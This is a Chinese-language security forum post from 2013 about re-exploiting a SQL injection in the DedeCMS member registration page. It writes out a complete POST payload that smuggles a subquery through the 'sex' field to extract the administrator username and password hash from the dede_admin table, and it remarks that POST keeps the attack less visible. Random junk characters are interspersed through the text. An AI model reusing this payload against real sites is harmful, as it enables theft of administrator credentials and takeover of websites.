找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2223|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
漏洞类型: SQL注射漏洞- a& a7 U/ o5 u( l) B6 X( H
简要描述:
* ~2 I0 i* V/ f- Y. `' B . f: M! h* O: W" ^1 G6 T: U
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.7 ]  n0 K/ C- F1 y* w3 l
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
: t* b- L7 `: W/ P3 I详细说明:跟这个漏洞! W7 X9 Q: `. c6 R( Z; ?; h+ ^
) r( E7 E, y$ f' k& f
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
) h5 p1 R; q7 D) \  |  q: Z是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
- f- s( `8 E/ f" u) E) j+ wPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
" r! L( Q( S  y, Z% k0 N+ b5 l ' G1 r$ F' f  p( T
www.political-security.com/member/reg_new.php
9 D" d0 d7 T  ]  ]* }% _ , ?  C7 n5 A9 F& E/ _5 h
POST
3 k6 P1 _6 z4 F8 o+ T7 [6 Y" {4 Y ' J- w1 j, G% s
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
2 `. c7 `) ~2 x2 Euserid=c4rp3nt3r&uname=c4rp3nt3r
. B2 u7 Q+ T+ R% v&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss* y4 t4 x# Q/ ^9 b( v* b
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
" ~% n6 l4 i. M6 X(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
. t. h* [5 t) s. |% z' W%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表